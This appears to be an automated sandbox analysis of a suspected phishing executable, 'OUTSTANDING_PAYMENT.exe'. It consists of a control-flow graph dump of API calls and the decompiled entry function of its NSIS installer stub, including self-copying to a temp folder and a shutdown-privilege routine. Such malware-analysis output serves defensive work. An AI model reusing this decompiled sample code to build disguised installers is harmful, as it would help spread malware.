3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                                                                                        Executed Functions

                                                                                                                        Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                                                                                        C-Code - Quality: 78%
                                                                                                                        			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\hardz\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\hardz\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                                                                                                        0x0040364e
                                                                                                                        0x0040364f
                                                                                                                        0x00403656
                                                                                                                        0x00403659
                                                                                                                        0x00403660
                                                                                                                        0x00403663
                                                                                                                        0x00403676
                                                                                                                        0x0040367c
                                                                                                                        0x0040367f
                                                                                                                        0x00403682
                                                                                                                        0x00403690
                                                                                                                        0x00403698
                                                                                                                        0x004036a3
                                                                                                                        0x004036bc
                                                                                                                        0x004036be
                                                                                                                        0x004036c6
                                                                                                                        0x004036c6
                                                                                                                        0x004036d1
                                                                                                                        0x004036d3
                                                                                                                        0x004036d3
                                                                                                                        0x004036e8
                                                                                                                        0x0040370d
                                                                                                                        0x0040371b
                                                                                                                        0x0040371e
                                                                                                                        0x00403725
                                                                                                                        0x0040372c
                                                                                                                        0x0040372c
                                                                                                                        0x00403725
                                                                                                                        0x0040372e
                                                                                                                        0x00403733
                                                                                                                        0x00403734
                                                                                                                        0x00403740
                                                                                                                        0x00403744
                                                                                                                        0x0040374b
                                                                                                                        0x00403759
                                                                                                                        0x0040375e
                                                                                                                        0x00403765
                                                                                                                        0x00403769
                                                                                                                        0x0040376d
                                                                                                                        0x0040376f
                                                                                                                        0x0040376f
                                                                                                                        0x0040376d
                                                                                                                        0x00403776
                                                                                                                        0x0040377d
                                                                                                                        0x00403783
                                                                                                                        0x0040379b
                                                                                                                        0x004037ab
                                                                                                                        0x004037b0
                                                                                                                        0x004037b6
                                                                                                                        0x004037bd
                                                                                                                        0x004037c4
                                                                                                                        0x004037c6
                                                                                                                        0x004037c7
                                                                                                                        0x004037d1
                                                                                                                        0x004037d8
                                                                                                                        0x004037da
                                                                                                                        0x004037dc
                                                                                                                        0x004037dc
                                                                                                                        0x004037ef
                                                                                                                        0x004037f1
                                                                                                                        0x004038eb
                                                                                                                        0x004038eb
                                                                                                                        0x004038ee
                                                                                                                        0x004038f1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004037fb
                                                                                                                        0x004037fc
                                                                                                                        0x004037ff
                                                                                                                        0x00403808
                                                                                                                        0x00403808
                                                                                                                        0x0040380b
                                                                                                                        0x0040380e
                                                                                                                        0x00403811
                                                                                                                        0x00403814
                                                                                                                        0x00403814
                                                                                                                        0x00403814
                                                                                                                        0x00403815
                                                                                                                        0x00403819
                                                                                                                        0x004038d9
                                                                                                                        0x004038e2
                                                                                                                        0x004038e4
                                                                                                                        0x004038e7
                                                                                                                        0x004038ea
                                                                                                                        0x004038ea
                                                                                                                        0x004038ea
                                                                                                                        0x00000000
                                                                                                                        0x0040381f
                                                                                                                        0x00403820
                                                                                                                        0x00403821
                                                                                                                        0x00403825
                                                                                                                        0x0040383f
                                                                                                                        0x00403846
                                                                                                                        0x00403859
                                                                                                                        0x0040385a
                                                                                                                        0x0040386f
                                                                                                                        0x00403874
                                                                                                                        0x00403876
                                                                                                                        0x00403878
                                                                                                                        0x00403894
                                                                                                                        0x0040389b
                                                                                                                        0x004038ae
                                                                                                                        0x004038af
                                                                                                                        0x004038c4
                                                                                                                        0x004038ca
                                                                                                                        0x004038cc
                                                                                                                        0x004038ce
                                                                                                                        0x004038d6
                                                                                                                        0x004038d8
                                                                                                                        0x00000000
                                                                                                                        0x004038d8
                                                                                                                        0x004038d2
                                                                                                                        0x004038d4
                                                                                                                        0x004038f9
                                                                                                                        0x004038fd
                                                                                                                        0x00403906
                                                                                                                        0x0040390b
                                                                                                                        0x00403911
                                                                                                                        0x0040391c
                                                                                                                        0x0040391e
                                                                                                                        0x00403923
                                                                                                                        0x00403925
                                                                                                                        0x0040397d
                                                                                                                        0x00403982
                                                                                                                        0x0040398b
                                                                                                                        0x00403992
                                                                                                                        0x00403995
                                                                                                                        0x00403b6c
                                                                                                                        0x00403b6c
                                                                                                                        0x00403b71
                                                                                                                        0x00403b7a
                                                                                                                        0x00403b97
                                                                                                                        0x00403c0f
                                                                                                                        0x00403c0f
                                                                                                                        0x00403c17
                                                                                                                        0x00403c19
                                                                                                                        0x00403c19
                                                                                                                        0x00403c1f
                                                                                                                        0x00403c1f
                                                                                                                        0x00403bae
                                                                                                                        0x00403bba
                                                                                                                        0x00403bcb
                                                                                                                        0x00403bd2
                                                                                                                        0x00403bd9
                                                                                                                        0x00403bd9
                                                                                                                        0x00403be1
                                                                                                                        0x00403bed
                                                                                                                        0x00403bfb
                                                                                                                        0x00403c06
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403bef
                                                                                                                        0x00403bef
                                                                                                                        0x00403bf0
                                                                                                                        0x00403bf2
